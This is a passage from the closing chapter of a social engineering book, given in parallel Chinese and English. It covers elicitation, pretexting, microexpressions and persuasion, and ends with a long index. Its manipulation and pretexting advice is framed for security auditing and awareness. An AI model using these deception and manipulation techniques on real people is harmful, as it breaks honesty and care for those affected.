一旦你掌握了这项技能,或者至少熟练地使用它,就可以开始练习使用诱导法。记住,没有人喜欢被审问的感觉。诱导法不应该模仿警察审问;它应该是一场流畅、无缝的对话,用于收集有关你正在寻找的目标或主题的情报。

Once you master that skill, or at least become proficient in using it, work on the way you use elicitation. Remember that no one loves the feeling of being interrogated. Elicitation should not mimic a police interrogation; it should be a smooth, seamless conversation that is used to gather intelligence on the target or topic you are seeking.

 

学习提出可用于正常对话的问题的方法和过程不仅可以提高您作为社会工程师的技能,还可以提高您作为沟通者的技能。当人们感到别人对他们的生活和工作感兴趣时,他们会感到高兴。将这项技能用于好事可以提高您作为社会工程师的能力。

Learning the methods and process used to come up with questions that can be used in normal conversation will not only enhance your skills as a social engineer but also as a communicator. People enjoy when they feel others are interested in their lives and their work. Using this skill for the good can enhance your ability as a social engineer.

 

我有一个好朋友,她能让人告诉她任何事情。这真是不可思议。完全陌生的人在谈话结束时会说这样的话:“我只是不知道我为什么要告诉你这些事情......”她不是社会工程师,甚至不是安全专家,但她是一个很棒的诱导者。

I have a good friend that gets people to tell her anything. It is uncanny. Complete strangers will, at the end of a conversation, say things like, “I just don’t know why I am telling you all these things...” She is not a social engineer or even in security, but she is a great elicitor.

 

掌握预加载和诱导可以提高你计划要说的话的能力。这些技能可以让你以更聪明、更少干扰的方式寻找和收集信息。

Mastering preloading and elicitation can enhance your ability to also plan out what you will say. These skills can put your mind in the frame of seeking and gathering information in a more intelligent and less intrusive way.

 

找个好借口

Have a Good Pretext

 

请记住,好的借口不是谎言或故事。相反,你会在短时间内成为并活在借口中。你的每一根纤维——你的思想、行动、言语和动机——都应该反映出借口的作用。如果你能做到这一点,那么你的借口对目标来说就会是可信的。

Remember that a good pretext is not a lie or a story. Instead you become and live your pretext for a short time. Every fiber of your being—your thoughts, actions, speech, and motivation—should reflect what the pretext would do. If you can accomplish this then your pretext will be believable to the target.

 

另外要记住的是,借口不仅用于社交工程,还用于日常生活中。想象一下这种情况:你刚和你的伴侣吵了一架。现在该上班了。你不想让每个人都知道今天家里的情况不太好,所以当你去上班时遇到同事,他们说:“嘿,吉姆,最近怎么样?”你的回答是:“太棒了。再好不过了。”

The other thing to remember is that pretexting is used in everyday life, not just in social engineering. Imagine this scenario: You just had an argument with your mate. Now it is time for work. You don’t want everyone to know that things at home aren’t that good this day, so when you go to work and meet your coworkers who say, “Hey Jim how’s it going?” Your reply is, “Awesome. Couldn’t be better.”

 

这与事实相反,但你要怎么做才能让人信服呢?向某人微笑,或者通过你的姿势或肢体语言表现出自信。根据你的隐私程度以及你不想与同事分享的程度,你甚至可能有一个“掩饰故事”来证明生活是多么美好。

That is the opposite of the truth but what do you do to make that believable? Shoot someone a smile, or project confidence via your posture or body language. Depending on how private you are and how much you don’t want to share with your co-workers you might even have a “cover story” to prove how great life is.

 

这只是一种情况,但人们总是使用借口。每当你试图向人们描绘与现实不符的东西时,为了让它可信而编造的“掩饰故事”就是借口。当然,大多数人并不擅长这一点,而且很容易被发现,但在你的生活和工作中注意到这些情况将为你提供一个很好的借口分析基础。

This is just one scenario, but people use pretexting all the time. Whenever you are trying to portray a difference from what is reality to people the “cover story” to make it believable is a pretext. Of course, most people aren’t really good at it and are easily detected, but noticing these situations in your life and work will give you a good basis of pretexting to analyze.

 

分析这些场景可以帮助您确定您想要改进的借口领域,并帮助您掌握这项非常有用的技能。

Analyzing these scenarios can help you identify areas you want to improve in your pretexts and help you master this very useful skill.

 

练习阅读表达

Practice Reading Expressions

 

我想我可以连续几周谈论微表情。这个话题让我着迷,想到人们有内在的机制来表达我们最深最黑暗的感受,而我们大多数人都无法控制它,这让我很感兴趣。我们的情绪如何导致某些肌肉收缩并在几毫秒内显示某种表情,这只是创造的一个惊人的方面。但学习如何注意它们、阅读它们,并使用这些表情来操纵他人,这确实让我感到震惊。

I think I can talk for weeks about microexpressions. The topic just fascinates me, and it intrigues me to think that people have built-in mechanisms for displaying our deepest darkest feelings, and most of us will have no control over it. How our emotions cause certain muscles to contract and display a certain expression for milliseconds is just an amazing aspect of creation. But learning how to notice them, read them, and use those very same expressions to manipulate others is something that truly astounds me.

 

练习如何重现第 5 章中讨论的微表情。在练习时,注意微表情在你身上引发的情绪。练习这些表情还能帮助你在别人表达这些表情时读懂它们。

Practice how to recreate the microexpressions discussed in Chapter 5. As you do, notice the emotions the microexpressions conjure up in you. Practicing these expressions will also help you read them when others express them.

 

在练习时,不要只关注如何读懂他人的微表情,而要关注如何控制自己的微表情,防止他人使用面部阅读技巧来解读你。请记住,读懂他人的表情是一项很好的技能,但控制自己的微表情、肢体语言和语调则更好。这项技能可以增强你的安全实践以及个人关系。掌握其中许多技能后,你将开始了解如何利用第 5 章中的主要概念之一,即人类缓冲区溢出 (HBO)。人类思维的工作原理与软件非常相似,只是在更高的层次上。但它可以像软件一样被模糊化、检查和推翻。重新阅读该部分以确保您完全理解所介绍的原则。

As you practice, do not focus just on what it takes to read microexpressions in others but on how to control your own microexpressions and prevent someone using their facial-reading reading skills on you. Remember that reading others is a good skill, but having control over your own microexpressions, body language, and vocal tones is far better. This skill can enhance your security practice as well as your personal relationships. After you master many of those skills, you will begin to see how you can utilize one of the main concepts Chapter 5, the human buffer overflow (HBO). The human mind works much like software, just on a higher level. But it can be fuzzed, examined, and overthrown like software. Re-read that section to make sure you fully understand the principles presented.

 

操纵和影响

Manipulation and Influence

 

操纵和影响是社交互动的两个方面,它们会对你与之互动的人产生一些戏剧性和强大的影响。因此,请极其谨慎地使用第 6 章中的信息。学习如何说服和操纵他人实际上可以决定社会工程事业的成败。每天,人们都试图操纵和说服他人采取行动。其中一些行为非常糟糕,可能会付出金钱、个人自由和身份的代价。

Manipulation and influence are two aspects of social interaction that have some dramatic and powerful effects on the people you interact with. For that reason, use the information in Chapter 6 with extreme care. Learning how to persuade and manipulate people can literally make the difference between success or failure in a social engineering endeavor. Every day, people try to manipulate and persuade others to take actions. Some of these actions are very bad and can cost money, personal freedom, and identities.

 

将这些情况用作教学工具。分析营销人员、心理学家、咨询师、教师甚至同事试图操纵你的方法。挑选出你认为可以学习的要点,并将它们纳入你的武器库。

Use those situations as teaching tools. Analyze the methods that marketers, psychologists, counselors, teachers, and even coworkers use to try to manipulate you. Pick out points that you think you can learn from and put them into your arsenal.

 

请记住,说服并不总是消极的:它并不总是意味着让某人做他们不想做的事情。说服可以产生非常积极的影响,而且很多时候,积极的说服要困难得多。如果你能掌握这些技能并利用它们帮助人们保持安全,你将更容易识别何时有人在消极地使用说服策略。

Remember that persuasion is not always negative: It doesn’t always have to mean getting someone to do something they don’t want. Persuasion can have very positive effects, and many times, positive persuasion is much more difficult. If you can master those skills and use them to help people stay secure, you will be more readily able to identify when someone is using persuasion tactics in a negative sense.

 

警惕恶意手段

Be Alert to Malicious Tactics

 

了解攻击者使用的策略肯定可以防止您成为他们的受害者。专业审计师可以使用这些策略来教育他们的客户在可能的攻击中要注意什么。保持警惕,找出这些策略被使用的例子。

Being aware of what tactics attackers use will surely keep you from falling victim to them. The professional auditors can use these tactics to educate their customers on what to look for in a possible attack. Be alert to pick out instances of how these are being used.

 

例如,“坏人”使用的一种策略是在困难时期发动袭击。当飞机撞上双子塔、地震袭击海地、海啸袭击亚洲时,人类及其生活、精神和情感所遭受的破坏是无法克服的。在人们最脆弱和最虚弱的时候,坏人正是发动袭击的时候。

For example, one tactic the “bad guys” use is to strike during times of trouble. When the planes hit the Twin Towers, the earthquakes hit Haiti, and the tsunami hit Asia, the devastation upon the human population and their lives, psyche, and emotions was insurmountable. During times of people’s vulnerability and weakness is exactly when the bad guys strike.

 

我来举个例子:我曾经看过一篇文章,讲的是狮子在野外捕猎的方式。文章说,狮子在想要扰乱和分散一群猎物以选择猎物时,会朝着地面咆哮——不是朝着猎物或天空,而是朝着地面。为什么?因为那巨大的、令人恐惧的吼叫声会在地面上回荡,包围猎物。猎物不知道狮子是从哪个方向来的,所以会感到困惑。有的会向左散开,有的会向右散开,但它们会放过它们年轻、年老、体弱和幼小的群体成员。

Let me illustrate it this way: I once read an article that spoke about how lions hunt in the wild. It said that a lion, when it wants to confuse and disjoint a group of prey to choose a victim, will roar towards the ground—not toward the prey or sky, but the ground. Why? It’s because the massive, fear-inspiring roar will reverb off the ground and surround the prey. They become confused by not knowing which direction the lion is coming from. Some will scatter left, some will scatter right, but they will leave their young, old, infirm, and immature herd members open.

 

上述情况与专业的恶意社交工程师的运作方式相差无几。他们“咆哮”的方式会造成或加剧混乱。他们使用网站帮助在自然灾害后寻找死去的亲人,或者声称自己在屠杀中失去了家人和朋友。当“目标”的情绪过于激动以至于无法看清真相时,攻击就会发生。

The preceding is not too far off from how professional malicious social engineers operate. They “roar” in such a way as to cause or add to the confusion. They use websites that help find dead loved ones after a natural disaster, or claim themselves to have lost family and friends in the carnage. When the emotions of the “targets” are so involved they can’t see straight is when an attack occurs.

 

缺乏经验和不成熟(从技术角度而言)的人首先会成为受害者,他们会泄露少量信息,直到攻击者有足够的信息来建立个人资料。该个人资料有助于发起进一步的攻击,而这些攻击会变得更加恶毒和无情。

The inexperienced and immature (technologically speaking) fall victim first by giving out little bits of information until the attacker has enough to build a profile. That profile helps launch further attacks, and those attacks get more vicious and heartless.

 

警惕这些情况,您将保护您的客户和您自己,避免成为受害者。此外,将这些情况作为学习课程,分析所使用的方法,看看它们是否有效或失败。这样做将增强您对潜在威胁的警惕能力。

Be alert to these instances, and you will keep your clients and yourself protected from falling victim to them. Also, use these situations as a learning lesson, analyze the methods used, and see whether they worked or failed. Doing so will enhance your ability to be more alert to potential threats.

 

狮子与社会工程师之间最令人遗憾的区别(除了显而易见的)在于,社会工程师不会发出可听见的吼叫。他不会在那里大喊:“我要猎物,快跑!”相反,恶意的社会工程师狡猾、微妙的攻击每年都会诱使成千上万的人落入他们的陷阱。

The unfortunate difference in between a lion and a social engineer (besides the obvious) is that a social engineer gives no audible roar. He is not out there yelling, “I want prey, now run!” Instead malicious social engineers’ sly, subtle attacks trick thousands into their traps each year.

 

利用你的恐惧

Use Your Fear

 

如果本章的内容让你产生了某种恐惧,我只能说“很好”。你需要它。因为健康的恐惧可以挽救你的生命,或者至少在这种情况下可以挽救你的身份和你的事业。

Now if this chapter has built any kind of fear in you all I can say is, “good.” You need it. Because healthy fear can save your life, or at least in this case your identity and your business.

 

利用这种恐惧来推动改变。不要生气和沮丧。下定决心改变,并教育自己、家人和公司如何观察、注意和防御这些攻击。下定决心不让自己的身份和公司遭受黑客攻击,然后采取行动。

Use that fear to motivate change. Don’t get angry and upset. Make a decision to change and to educate yourself, your families, and your companies how to observe, notice, and defend against these attacks. Make a decision to not allow your identities and your companies to be hacked, and then do something about it.

 

整本书归结为“通过教育实现安全”。人类黑客是一种艺术形式。社会工程学是科学、艺术和技能的混合体。当以适当的数量和正确的组合混合时,结果就是“无用”。

This whole book boils down to “security through education.” Human hacking is an art form. Social engineering is a mixture and blending of sciences, art, and skill. When blended in the right amount and right mixture the results are “shikata ga nai.”

 

公司每年因违规行为损失数百万美元,其中大部分违规行为源于社会工程攻击。然而,当我们向客户提供在其渗透测试服务中添加社会工程审计的机会时,他们往往拒绝了。

Companies lose millions of dollars per year to breaches, with a large majority of those breaches stemming from social engineering attacks. Yet, more often than not, when we offer clients the chance to add social engineering auditing to their pentesting services they decline.

 

为什么?

Why?

 

公司往往害怕改变。在我的职业生涯中,我无数次听到聪明而成功的企业主说这样的话:“我们不需要社会工程审计。我们的员工不会被这些花招所蒙骗。”然后在渗透测试期间,我们会打几个授权电话来获取信息,当我们在报告中呈现这些信息时,他们会惊讶地发现获取这些信息是多么容易。

Companies tend to fear change. Countless times in my professional practice I have heard intelligent and successful business owners say things like, “We don’t need a social engineering audit. Our people won’t fall for those tricks.” Then during the pentest we will do a few authorized phone calls to get information and when we present the information in the report they are amazed how easy it was to get the information.

 

在各个公司的各个层面,安全意识往往不会发生太大变化。当我们在渗透测试结束后与公司谈论我们推出的安全意识培训计划时,许多公司告诉我们,他们没有对呼叫中心或技术支持部门进行正式的强化培训。然而,这些部门最常遭受社会工程攻击。

At all levels of various companies, security awareness doesn’t tend to change much. When speaking to companies after a pentest about a security awareness training program we launched, many told us they do not perform formal intense training for call center or tech support departments. Yet those are the same departments that most often fall for social engineering attacks.

 

这指出了我在这里谈论的问题的核心。通过教育实现安全不能只是一句口号,而必须成为一项使命宣言。除非公司及其员工认真对待安全问题,否则这个问题不会得到彻底解决。与此同时,那些认真阅读这本书并渴望窥探社会黑暗角落的人可以提高自己的技能,让他们的家人、自己和公司更加安全。

This points to the core of the problem that I am speaking about here. Security through education cannot be a simple catch phrase; it has to become a mission statement. Until companies and the people who make up those companies take security personally and seriously, this problem won’t be fixed completely. In the meantime, those who were serious enough to read this book and to have a desire to peer into the dark corners of society can enhance their skills enough to keep their families, selves, and companies a little more secure.

 

当“狮子吼叫”时,你要成为领头羊,带领大家逃离。要树立榜样,告诉人们应该做什么以及如何抵御这些攻击。

When the “lion roars,” be the one who is at the front of the pack leading the exodus out of the way. Be an example of what to do and how to defend against these attacks.

 

只要有足够的时间和精力,任何人都可能遭受社会工程攻击。这些话是真的,尽管它们很可怕。这并不意味着没有希望;这意味着你的工作是让恶意的社会工程变得如此困难和耗时,以至于大多数黑客都会放弃并追逐“唾手可得的果实”或留下的猎物。我知道;这听起来很冷酷。如果每个人都读这本书并做出一些重大改变,我会很高兴——这样公司就会真正安全。但这不是我们生活的世界。

With enough time and enough effort anyone can be social engineered. Those words are true, as scary as they are. That doesn’t mean there is no hope; it means your job is to make malicious social engineering so difficult and time consuming that most hackers will give up and go after “low-hanging fruit” or the prey that is left behind. I know; it sounds cold. I would love it if everyone would read this book and make some massive changes—then companies would be truly secure. But that is just not the world we live in.

 

那么,这句话提出了一个非常严肃的问题。如果真的没有希望,公司、个人、家庭和每个人如何才能防范这种巨大的漏洞?在公司开始意识到自己容易受到社会工程攻击之前,个人必须了解攻击方法并保持警惕,并将消息传播给他人。只有这样,我们才有希望领先攻击一步,至少不会落后太多。

That statement, then, raises a very serious question. If there truly is no hope, how can companies, people, families, and everyone protect against this massive vulnerability? Until companies begin to realize their vulnerability to social engineering attacks, individuals will have to educate themselves about attack methods and stay vigilant, as well as spread the word to others. Only then do we have hope of staying if not one step ahead of an attack, then not too far behind.

 

概括

Summary

 

在结束这本书时,我希望它能让你对社会工程学的世界有所了解。我希望它能继续帮助你注意恶意攻击的可能性。我希望它能帮助你建立或保持对潜在灾难的合理恐惧。

As I conclude this book, I hope it has opened your eyes to the world of social engineering. I hope that it will continue to help you take note of the potential for malicious attacks. I hope it has helped you build or maintain a healthy fear of the potential for disaster.

 

我也希望这本书能帮助您保护您的企业、您的家庭、您的孩子、您的投资和您的生命。我希望书中的信息能让您明白,保持完全安全和受到保护并非不可能。

I also hope this book helps you to protect your businesses, your families, your children, your investments, and your life. I hope that the information within has showed you that staying completely secure and protected is not impossible.

 

我的导师马蒂·阿哈罗尼 (Mati Aharoni) 在一堂课上说,坏人之所以经常获胜,是因为他们有奉献精神、时间和动力。不要让生活成为安全之路的绊脚石。相反,不要让对坏人的过​​度恐惧阻碍你享受生活。

Mati Aharoni, my mentor, says in one of his classes that the reason the bad guys usually win is because they have dedication, time, and motivation on their side. Don’t let life get in the way of security. Conversely, don’t let too much fear of the bad guys keep you from enjoying life.

 

我希望运用本书中的原则可以提高您阅读和与周围人更有效地沟通的能力。在生活的许多方面(不仅仅是安全方面)运用这些原则可以证明是一项改变生活的练习。社会工程学确实是一种艺术形式。尽情享受吧。

I hope that applying the principles in this book enhances your ability to read and communicate more effectively with people around you. Using them in many aspects of your life, not just security, can prove to be a life-altering exercise. Social engineering is truly an art form. Enjoy.

 

指数

Index

 

数字

Numbers

 

7-38-55 规则

7-38-55 Rule

 

419诈骗

419 scam

 

A

A

 

阿巴格纳尔,小弗兰克

Abagnale, Frank Jr.

 

积极倾听、反思性回应和

active listening, reflective responding and

 

咄咄逼人的审讯方式

aggressive approach to interrogation

 

阿哈罗尼,马蒂

Aharoni, Mati

 

程序崩溃

program crashes

 

集邮

stamp collection

 

空军训练、社会激励和

Air Force training, social incentives and

 

酒精、排泄和

alcohol, eliciation and

 

替代路线

alternate route

 

亚马逊徽标

Amazon logo

 

锚定

anchoring

 

愤怒、微表情

anger, microexpressions

 

焦虑

anxiety

 

外表、建立融洽关系和

appearance, rapport building and

 

手臂/手的位置

arm/hand placement

 

要求你想要的东西

ask for what you want

 

假定知识

assumed knowledge

 

积极操纵中的假设

assumptions in positive manipulation

 

假设性问题

assumptive questions

 

星号

Asterisk

 

攻击

attacks

 

最昂贵的

costliest

 

达赖喇嘛

Dalai Lama

 

识别

identifying

 

注意,保持

attention, holding

 

吸引力

attractiveness

 

拍卖,一致性

auctions, consistency

 

声音录制

audio recording

 

蜂窝卡

cellular card

 

听觉思考者

auditory thinkers

 

审计

audits

 

审计师选择

auditor selection

 

目标设定

goal setting

 

包含物品

included items

 

权威

authority

 

法律权威

legal authority

 

组织权威

organizational authority

 

社会权威

social authority

 

符号

symbols

 

的象征

symbols of

 

B

 

背景检查员

background checkers

 

回溯

BackTrack

 

篮子

BasKet

 

德拉迪斯

Dradis

 

Balmund,DC,通信交易模型

Balmund, D.C., transactional model of communications

 

奥丽安娜·班迪耶拉

Bandiera, Oriana

 

理查德·班德勒

Bandler, Richard

 

故事作为直接指导

stories as direct instructions

 

银行账户,Blippy

bank accounts, Blippy

 

银行电汇,斯坦利·马克·里夫金

bank wire transfer, Stanley Mark Rifkin

 

伊万·巴兰凯

Barankay, Iwan

 

巴特利特,弗雷德里克 C.

Barlett, Frederic C.

 

目标的基线行为

baseline behavior for targets

 

篮子

BasKet

 

笔记

notes

 

截图

screenshots

 

格雷戈里·贝特森

Bateson, Gregory

 

心灵之战(萨金特)

Battle for the Mind (Sargant)

 

美丽、成功和

beauty, success and

 

欺骗行为的改变

behavior changes in deception

 

罗伯特·本福德

Benford, Robert

 

Berlo,David,SMCR(发送者-消息-通道-接收者)模型

Berlo, David, SMCR (Sender-Message-Channel-Receiver) model

 

BitDefender,密码使用

BitDefender, password usage

 

黑色色彩联想

black color association

 

哔哔

Blippy

 

Bloomingdales 的收购

Bloomingdales’ purchase

 

蓝色联想

blue color association

 

身体语言

body language

 

康登,威廉

Condon, William

 

匹配

matching

 

微动作

micro-movements

 

身体姿势、询问和

body posture, interrogation and

 

Boehm,Stephan G.

Boehm, Stephan G.

 

尼古拉斯·布斯曼

Boothman, Nicholas

 

品牌名称

brand names

 

理查德·布兰德勒,神经语言程序设计

Brandler, Richard, neurolinguistic programming

 

呼吸率

breathing rate

 

克里斯托夫·布雷格勒

Bregler, Christoph

 

史蒂夫·布雷塞特

Bressert, Steve

 

棕色色彩联想

brown color association

 

缓冲区,定义

buffer, definition

 

缓冲区溢出

buffer overflow

 

人类

human

 

嵌入命令

embedded commands

模糊测试

fuzzing

撞击键

bump keys

 

防撞 BiLock

Bump Proof BiLock

 

巴特勒,朱迪思

Butler, Judith

 

C

C

 

来电显示欺骗

Caller ID spoofing

 

相机

cameras

 

罗伯特·坎波

Campeau, Robert

 

加拿大 CTU(反恐部队),建设计划

Canadian CTU (Counter-Terrorism Unit), building plans

 

偷拍相机

Candid Camera

 

狂欢节,一致性和

carnivals, consistency and

 

实例探究

case studies

 

DMV 黑客

DMV hack

 

的重要性

importance of

 

过度自信的首席执行官

Overconfident CEO

 

社会保障管理局被黑客攻击

Social Security Administration hack

 

主题公园丑闻

Theme Park Scandal

 

绝密1

Top Secret 1

 

绝密2

Top Secret 2

 

凯西·马什人口普查和调查信息中心

Cathie Marsh Centre for Census and Survey Information

 

明星代言产品

celebrity endorsement of product

 

用于录音的蜂窝卡

cellular card for audio recording

 

细胞

CeWl

 

加拿大军事基地(CFB),安全漏洞

CFB (Canadian Forces Base), security breach

 

让·夏尔·切巴特

Chebat, Jean-Charles

 

在车里撕毁的支票

checks ripped up in car

 

西奥迪尼,罗伯特

Cialdini, Robert

 

权威和

authority and

 

承诺和一致性

commitment and consistency

 

护士实验

nurse experiment

 

社会证明

social proof

 

封闭式问题

closed-ended questions

 

同事被视为安全威胁

co-workers as security threat

 

强迫

coercion

 

咖啡店里的谈话

coffee shop conversation

 

认知失调

cognitive dissonance

 

色彩操纵

color in manipulation

 

黑色的

black

 

蓝色的

blue

 

棕色的

brown

 

金子

gold

 

绿色的

green

 

橙子

orange

 

紫色的

purple

 

红色的

red

 

白色的

white

 

黄色的

yellow

 

组合审讯法

combination approach to interrogation

 

舒适区

comfort zones

 

承诺

commitment

 

嘉年华

carnivals

 

决定和

decisions and

 

游戏屋

game houses

 

直觉

gut feelings

 

信息收集和

information gathering and

 

沟通

communication

 

定义

definition

 

能源和

energy and

 

形式

forms

 

非语言部分

nonverbal portion

 

感知和

perception and

 

个人现实和

personal realities and

 

过程

process

 

规则

rules

问题和

questions and

 

规则

rules

 

社会工程师和

social engineers and

 

USB 驱动器接受

USB drive acceptance

 

口头部分

verbal portion

 

沟通模式

communication model

 

渠道

channel

 

发展

developing

 

反馈

feedback

 

信息收集和

information gathering and

 

信息

message

 

接收者

receiver

 

香农-韦弗模型

Shannon-Weaver model

 

基础

basis

问题

problems for

SMCR(发送者-消息-通道-接收者)模型

SMCR (Sender-Message-Channel-Receiver) model

 

来源

source

 

成功

success

 

交易模式

transactional model

 

通信建模

communication modeling

 

计算机安全研究所调查

Computer Security Institute survey

 

让步

concession

 

附带特许权

contingent concessions

 

捐赠请求

donation requests

 

分期付款

installments

 

标签优惠

label concessions

 

谈判和

negotiation and

 

互惠

reciprocity

 

结论、借口和

conclusion, pretexting and

 

调理

conditioning

 

营销

marketing

 

康登,威廉

Condon, William

 

身体语言

body language

 

微动作

micro-movements

 

NLP(神经语言程序设计)

NLP (neurolinguistic programming)

 

电子邮件中的机密数据

confidential data in email

 

对抗,积极

confrontation, positive

 

共识

consensus

 

保守运动

Conservative Movement

 

一致性

consistency

 

拍卖

auctions

 

嘉年华

carnivals

 

决定和

decisions and

 

游戏屋

game houses

 

信息收集和

information gathering and

 

营销

marketing

 

轻蔑、微表情

contempt, microexpressions

 

附带特许权

contingent concessions

 

欺骗中的矛盾

contradictions in deception

 

控制环境

controlling environment

 

对话

conversation

 

教育

education

 

面部表情

facial expressions

 

贪婪

greed

 

掌握艺术

mastering art

 

自然行为

natural behavior

 

反恐、构陷和

counterterrorism, framing and

 

优惠券作为财务激励

coupons as financial incentive

 

米歇尔·科维尔

Covell, Michele

 

克雷格(KD)

Craig, K.D.

 

克兰德尔,克里斯蒂安

Crandall, Christian

 

邪教、操纵和

cults, manipulation and

 

文化差异

cultural differences

 

手势

gestures

 

互惠和

reciprocity and

 

CUPP(通用用户密码分析器)

CUPP (Common User Passwords Profiler)

 

好奇心、融洽关系和

curiosity, rapport and

 

D

 

达赖喇嘛

Dalai Lama

 

DarkMarket,Splynter 大师

DarkMarket, Master Splynter

 

DarkReading,数据泄露

DarkReading, data breaches

 

查尔斯·达尔文,《人类与动物的情感表达》

Darwin, Charles, The Expression of the Emotions in Man and Animals

 

戴维斯,哈里

Davis, Harry

 

布洛涅,杜兴,微笑

de Boulogne, Duchenne, smiling

 

欺骗检测

deception detection

 

行为改变

behavior changes

 

矛盾

contradictions

 

手势

hand gestures

 

犹豫

hestitation

 

决策、承诺和一致性

decision making, commitment and consistency

 

朱迪思·德洛齐尔

DeLozier, Judith

 

乌龟一路走低

Turtles All the Way Down

 

否认、审问和

denials, interrogation and

 

国防部、审讯和

Department of Defense, interrogation and

 

DHS(国土安全部),诱导

DHS (Department of Homeland Security), elicitation

 

方言,练习

dialects, practicing

 

舞台方言(马克林)

Dialects for the Stage (Machlin)

 

直接审讯方式

direct approach to interrogation

 

直接指示、故事

direct instructions, stories as

 

灾难受害者

disaster victims

 

心怀不满的员工

disgruntled employees

 

厌恶、微表情

disgust, microexpressions

 

导流

diversion

 

DMV 黑客攻击 (米特尼克)

DMV hack (Mitnick)

 

医生

doctors

 

文件,切碎

documents, shredded

 

狗语者

Dog Whisperer

 

主导意识、辨别力

dominant sense, discernment

 

捐赠请求

donation requests

 

德拉迪斯

Dradis

 

翻找垃圾箱的指南

dumpster diving pointers

 

邓恩,帕特里夏

Dunn, Patricia

 

邓白氏报告

Dunn and Bradstreet reports

 

E

 

经济学、稀缺性原则和

economics, scarcity principle and

 

教育、安全和

education, security and

 

自负的审讯方式

egotistical approach to interrogation

 

艾德尔曼,斯科特

Eidelman, Scott

 

保罗·埃克曼

Ekman, Paul

 

情绪表露

Emotions Revealed

 

FACS(面部动作编码系统)

FACS (Facial Action Coding System)

 

微表情

microexpressions

 

情绪

emotions

训练

training

莫琳·奥沙利文

O’Sullivan, Maureen

 

揭开面纱

Unmasking the Face

 

巫师计划

Wizards Project

 

肘部放置

elbow placement

 

电子锁

electronic locks

 

引出

elicitation

 

酒精

alcohol

 

诉诸自我

appealing to ego

 

假定知识

assumed knowledge

 

定义

definition

 

DHS(国土安全部)

DHS (Department of Homeland Security)

 

面部表情和

facial expressions and

 

虚假陈述,故意

false statements, deliberate

 

目标

goals of

 

信息收集和

information gathering and

 

共同的利益

mutual interest

 

美国国家安全局 (NSA)

NSA (National Security Agency)

 

预加载和

preloading and

 

问题

questions

 

假定

assumptive

封闭式

closed-ended

领导

leading

开放式

open-ended

金字塔方法

pyramid approach

其有效的原因

reasons it works

 

成功

success

 

志愿服务信息

volunteering information

 

电子邮件、机密数据

email, confidential data

 

嵌入命令

embedded commands

 

情感审讯方式

emotional approach to interrogation

 

目标的情感依恋

emotional attachments of target

 

情绪

emotions

 

控制

controlling

 

直觉

gut feelings

 

影响

influence

 

干扰

interferring

 

宏表达式

macroexpressions

 

微表情

microexpressions

 

愤怒

anger

鄙视

contempt

厌恶

disgust

保罗·埃克曼

Ekman, Paul

害怕

fear

幸福

happiness

悲伤

sadness

惊喜

surprise

劝说

persuasion

 

目标的行为和

target’s behavior and

 

普遍性

unversality

 

情绪表露(埃克曼)

Emotions Revealed (Ekman)

 

共情

empathy

 

灾难受害者

disaster victims

 

保险公司

insurance company

 

融洽关系和

rapport and

 

雇员

employees

 

不满

disgruntled

 

盗窃

theft

 

能源、通讯和

energy, communication and

 

工程,定义

engineering, defintion

 

环境控制

environment control

 

欧洲法律、端口扫描仪

European laws, port scanners

 

夸张审讯法

exaggeration approach to interrogation

 

高管招聘人员

executive recruiters

 

期望,期望定律

expectations, law of expectations

 

表达,练习

expressions, practicing

 

眼睛

eyes

 

线索

cues

 

审讯和

interrogation and

 

F

F

 

保全面子的审讯方式

face-saving approach to interrogation

 

Facebook

Facebook

 

面部表情

facial expressions

 

引出和

elicitation and

 

人类与动物的情感表达

The Expression of the Emotions in Man and Animals

 

宏表达式

macroexpressions

 

微表情

microexpressions

 

欺骗检测

deception detection

局限性

limitations

镜像

mirroring

神经语言黑客

neurolinguistic hacking

训练看看

training to see

微瞬间表达

micromomentary expressions

 

坚忍的眼神

stoic eyes

 

FACS(面部动作编码系统)

FACS (Facial Action Coding System)

 

FBI,思维模式

FBI, modes of thinking

 

害怕

fear

 

微表情

microexpressions

 

惊喜和

surprise and

 

联邦快递徽标

FedEx logo

 

聆听时提供反馈

feedback while listening

 

脚。参见手/脚

feet. See hands/feet

 

费斯廷格,莱昂,认知失调

Festinger, Leon, cognitive dissonance

 

财政奖励

financial incentives

 

第一印象

first impressions

 

灵活性

flexibility

 

坚持到底、借口和

follow-through, pretexting and

 

参照系

frame of reference

 

框架

framework

 

目的

purpose

 

框架

framing

 

对齐,类型

alignment, types

 

放大

amplification

 

品牌名称

brand names

 

桥接

bridging

 

反恐

counterterrorism

 

扩大

extension

 

标签

labeling

 

感知和

perception and

 

政治

politics

 

反对

protest

 

关系和

relationships and

 

关联

relevance

 

潜意识的

subliminal

 

任务

tasks

 

酷刑

torture

 

转型

transformation

 

电视真人秀

TV reality shows

 

用途

uses

 

视觉的

visual

 

乔纳森·弗伦岑

Frenzen, Jonathan

 

FTC(联邦贸易委员会)

FTC (Federal Trade Commission)

 

借口和

pretexting and

 

温斯顿·乔尔

Winston, Joel

 

模糊测试

fuzzing

 

G

G

 

游戏屋,一致性和

game houses, consistency and

 

手势

gestures

 

锚定

anchoring

 

焦虑

anxiety

 

手臂/手的位置

arm/hand placement

 

文化差异

cultural differences

 

大的

large

 

镜像

mirroring

 

张开手掌

open palm

 

重复

repetitive

 

尖塔状手指

steepled fingers

 

敲击/敲击手指

tapping/drumming fingers

 

触摸自己

touching self

 

目标

goals

 

审计

of audit

 

影响

influence

 

劝说

persuasion

 

金色联想

gold color association

 

谷歌

Google

 

谷歌 Dorks

Google Dorks

 

操作数

operands

 

面向渗透测试人员的 Google 黑客技术(长篇)

Google Hacking for Penetration Testers (Long)

 

阿尔文·古尔德纳 (Alvin Gouldner) 论互惠

Gouldner, Alvin, on reciprocity

 

政府

governments

 

GPS 定位、智能手机、照片

GPS location, smart phones, photographs

 

GPS追踪器

GPS Tracker

 

读取数据

reading data

 

绿色联想

green color association

 

格林德,约翰

Grinder, John

 

神经语言程式

neurolinguistic programming

 

乌龟一路走低

Turtles All the Way Down

 

有罪

guilt

 

直觉

gut feelings

 

H

H

 

黑客

hackers

 

同事构成安全威胁

versus co-workers as security threat

 

投资回报率 (ROI) 和

ROI (return on investment) and

 

黑客

hacks

 

车辆管理处

DMV

 

过度自信的首席执行官

Overconfident CEO

 

社会保障局

Social Security Administration

 

主题公园丑闻

Theme Park Scandal

 

绝密1

Top Secret 1

 

绝密2

Top Secret 2

 

光环效应

halo effect

 

欺骗的手势

hand gestures in deception

 

手部放置

hand placement

 

手/脚,审讯和

hands/feet, interrogation and

 

幸福

happiness

 

微笑,真

smile, true versus fake

 

收割

harvesting

 

头部位置、询问和

head position, interrogation and

 

听力

hearing

 

